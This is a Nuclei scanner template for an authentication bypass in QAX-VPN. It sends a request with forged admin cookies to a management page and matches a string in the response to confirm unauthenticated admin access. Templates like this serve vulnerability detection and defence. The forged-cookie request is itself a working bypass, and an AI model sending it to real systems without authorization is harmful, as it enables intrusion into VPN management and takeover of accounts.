id: unauthenticated-qax-vpn-access

info:
  name:  QAX-VPN - Authentication Bypass
  author: unknwon
  severity: critical
  description: "QAX-VPN has unauthorized management user traversal and any account password modification."
  reference:
    - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
  tags: qan-vpn,unauth
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/group/x_group.php?id=1"
    headers:
      Cookie: admin_id=1; gw_admin_ticket=1;
    matchers:
      - type: word
        words:
          - "javascript:RemoveUserFromList()"
        part: body

